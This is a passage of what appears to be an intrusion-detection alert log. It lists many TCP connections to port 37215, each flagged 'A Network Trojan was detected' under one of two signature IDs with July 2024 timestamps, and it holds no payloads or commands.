                  Source Port:44074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.829336
                  SID:2835222
                  Source Port:52730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.277913
                  SID:2829579
                  Source Port:35182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.251063
                  SID:2829579
                  Source Port:39168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.377315
                  SID:2829579
                  Source Port:49968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.661675
                  SID:2829579
                  Source Port:40298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569850
                  SID:2829579
                  Source Port:42412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.901081
                  SID:2835222
                  Source Port:33150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.874012
                  SID:2835222
                  Source Port:44570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.179402
                  SID:2829579
                  Source Port:34894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.862601
                  SID:2829579
                  Source Port:38680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328936
                  SID:2835222
                  Source Port:41768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.352222
                  SID:2835222
                  Source Port:58526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.211493
                  SID:2835222
                  Source Port:43424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.381146
                  SID:2829579
                  Source Port:47606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.190243
                  SID:2829579
                  Source Port:52404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.831762
                  SID:2835222
                  Source Port:40932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.138441
                  SID:2835222
                  Source Port:60758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.569542
                  SID:2835222
                  Source Port:40260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.875579
                  SID:2835222
                  Source Port:59512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.827119
                  SID:2835222
                  Source Port:48702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.174408
                  SID:2829579
                  Source Port:47848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.873958
                  SID:2829579
                  Source Port:44270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652342
                  SID:2835222
                  Source Port:39084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.313392
                  SID:2829579
                  Source Port:59262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.310661
                  SID:2835222
                  Source Port:59738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.194125
                  SID:2829579
                  Source Port:57740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.604198
                  SID:2829579
                  Source Port:52394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.871323
                  SID:2829579
                  Source Port:40154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.890677
                  SID:2829579
                  Source Port:60042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.512304
                  SID:2835222
                  Source Port:39872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.849464
                  SID:2835222
                  Source Port:42982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.844638
                  SID:2835222
                  Source Port:51018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.912875
                  SID:2835222
                  Source Port:42216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.864255
                  SID:2835222
                  Source Port:51170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.217078
                  SID:2835222
                  Source Port:47182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.138827
                  SID:2835222
                  Source Port:54972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.569489
                  SID:2835222
                  Source Port:34222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.773863
                  SID:2829579
                  Source Port:34290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.155928
                  SID:2829579
                  Source Port:35798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.158777
                  SID:2829579
                  Source Port:38080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.875122
                  SID:2829579
                  Source Port:45498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.616142
                  SID:2829579
                  Source Port:38836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.606203
                  SID:2835222
                  Source Port:35918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.056962
                  SID:2829579
                  Source Port:57024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.544307
                  SID:2835222
                  Source Port:44190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.093189
                  SID:2835222
                  Source Port:59740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.439109
                  SID:2835222
                  Source Port:33032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.890677
                  SID:2829579
                  Source Port:36956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2829579
                  Source Port:50828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298616
                  SID:2829579
                  Source Port:59610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.764696
                  SID:2829579
                  Source Port:58422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.635784
                  SID:2835222
                  Source Port:51394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.041002
                  SID:2835222
                  Source Port:49248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.116330
                  SID:2835222
                  Source Port:58750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602369
                  SID:2835222
                  Source Port:40346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.157761
                  SID:2829579
                  Source Port:59840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.625693
                  SID:2829579
                  Source Port:33138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.757407
                  SID:2835222
                  Source Port:54376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.182462
                  SID:2829579
                  Source Port:52668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.939164
                  SID:2835222
                  Source Port:42188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.115720
                  SID:2835222
                  Source Port:45616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.299447
                  SID:2835222
                  Source Port:50734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2835222
                  Source Port:44860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.354111
                  SID:2829579
                  Source Port:60002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.131272
                  SID:2829579
                  Source Port:47292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.078747
                  SID:2835222
                  Source Port:34122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929842
                  SID:2829579
                  Source Port:42934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986594
                  SID:2829579
                  Source Port:60024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462338
                  SID:2835222
                  Source Port:47118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.548799
                  SID:2835222
                  Source Port:44598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.140242
                  SID:2829579
                  Source Port:43850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.128256
                  SID:2829579
                  Source Port:42684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.233513
                  SID:2835222
                  Source Port:43140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.851109
                  SID:2835222
                  Source Port:46568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.636567
                  SID:2829579
                  Source Port:48508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177633
                  SID:2829579
                  Source Port:41960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2829579
                  Source Port:50474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.171305
                  SID:2829579
                  Source Port:37664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.901324
                  SID:2829579
                  Source Port:58592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.501258
                  SID:2829579
                  Source Port:53344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.780111
                  SID:2829579
                  Source Port:54994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.212811
                  SID:2829579
                  Source Port:37068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.590105
                  SID:2829579
                  Source Port:58978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.079394
                  SID:2829579
                  Source Port:36610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.790493
                  SID:2835222
                  Source Port:33898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821259
                  SID:2829579
                  Source Port:37208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.432680
                  SID:2835222
                  Source Port:49918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392064
                  SID:2835222
                  Source Port:59586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.791471
                  SID:2829579
                  Source Port:34690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.930927
                  SID:2829579
                  Source Port:49062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.064971
                  SID:2829579
                  Source Port:39560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.600154
                  SID:2835222
                  Source Port:46852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.186644
                  SID:2835222
                  Source Port:48438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.215395
                  SID:2835222
                  Source Port:44420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188869
                  SID:2829579
                  Source Port:41980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.709272
                  SID:2835222
                  Source Port:34744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828645
                  SID:2835222
                  Source Port:50168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.812421
                  SID:2829579
                  Source Port:36952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.457163
                  SID:2829579
                  Source Port:37358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339204
                  SID:2835222
                  Source Port:42018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.890895
                  SID:2835222
                  Source Port:58428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.548975
                  SID:2835222
                  Source Port:37442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.560548
                  SID:2835222
                  Source Port:49116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633742
                  SID:2835222
                  Source Port:36320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558738
                  SID:2835222
                  Source Port:45860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470816
                  SID:2829579
                  Source Port:51592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.613863
                  SID:2835222
                  Source Port:37654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.814735
                  SID:2835222
                  Source Port:43994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.773941
                  SID:2835222
                  Source Port:58600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.785071
                  SID:2835222
                  Source Port:59282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.873299
                  SID:2835222
                  Source Port:43162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.938620
                  SID:2829579
                  Source Port:56552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.960934
                  SID:2829579
                  Source Port:43860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.371884
                  SID:2829579
                  Source Port:60962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.832820
                  SID:2835222
                  Source Port:39406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.229763
                  SID:2829579
                  Source Port:40620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.814052
                  SID:2829579
                  Source Port:42016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.223623
                  SID:2835222
                  Source Port:35058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113907
                  SID:2829579
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.574047
                  SID:2835222
                  Source Port:50818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602749
                  SID:2829579
                  Source Port:53844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106544
                  SID:2829579
                  Source Port:52738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.508243
                  SID:2829579
                  Source Port:33438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415369
                  SID:2829579
                  Source Port:45558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.406759
                  SID:2829579
                  Source Port:40530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2829579
                  Source Port:58080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587668
                  SID:2829579
                  Source Port:60348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.911509
                  SID:2835222
                  Source Port:57428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.833295
                  SID:2829579
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.472722
                  SID:2835222
                  Source Port:51166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.223907
                  SID:2835222
                  Source Port:59804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.657755
                  SID:2835222
                  Source Port:33608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.375967
                  SID:2835222
                  Source Port:47946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.571607
                  SID:2829579
                  Source Port:37926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.273517
                  SID:2835222
                  Source Port:52552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.871447
                  SID:2829579
                  Source Port:52760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.988456
                  SID:2835222
                  Source Port:40226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.781725
                  SID:2835222
                  Source Port:50532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.758609
                  SID:2835222
                  Source Port:35360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917453
                  SID:2829579
                  Source Port:58760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.766150
                  SID:2835222
                  Source Port:43224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.196604
                  SID:2835222
                  Source Port:51422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.751241
                  SID:2829579
                  Source Port:60976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.845196
                  SID:2835222
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.853390
                  SID:2835222
                  Source Port:46214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.217432
                  SID:2835222
                  Source Port:49980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.273552
                  SID:2829579
                  Source Port:34786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.837976
                  SID:2829579
                  Source Port:48120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.596186
                  SID:2835222
                  Source Port:51608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.562596
                  SID:2829579
                  Source Port:53596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.477490
                  SID:2835222
                  Source Port:46276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.873311
                  SID:2829579
                  Source Port:38938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448205
                  SID:2829579
                  Source Port:39936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.117680
                  SID:2829579
                  Source Port:52756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.137908
                  SID:2829579
                  Source Port:39858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.002361
                  SID:2835222
                  Source Port:47286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.001524
                  SID:2835222
                  Source Port:58500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2835222
                  Source Port:53734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.453874
                  SID:2835222
                  Source Port:53662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.493700
                  SID:2829579
                  Source Port:47824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395459
                  SID:2829579
                  Source Port:53524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.399244
                  SID:2835222
                  Source Port:45384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.000596
                  SID:2829579
                  Source Port:45644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.824276
                  SID:2829579
                  Source Port:55946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.864839
                  SID:2829579
                  Source Port:38428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.364208
                  SID:2829579
                  Source Port:34028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.083143
                  SID:2835222
                  Source Port:58692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.548548
                  SID:2835222
                  Source Port:45322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.380057
                  SID:2829579
                  Source Port:48756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.501791
                  SID:2829579
                  Source Port:55842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.019850
                  SID:2835222
                  Source Port:55750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303289
                  SID:2835222
                  Source Port:58692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.515312
                  SID:2835222
                  Source Port:35918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.609336
                  SID:2835222
                  Source Port:35772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.477184
                  SID:2829579
                  Source Port:54000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.147073
                  SID:2829579
                  Source Port:35132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.567631
                  SID:2835222
                  Source Port:48626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.523582
                  SID:2835222
                  Source Port:60296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.626199
                  SID:2829579
                  Source Port:49536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.357682
                  SID:2835222
                  Source Port:54670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.758610
                  SID:2829579
                  Source Port:49204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.822075
                  SID:2835222
                  Source Port:49194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.326825
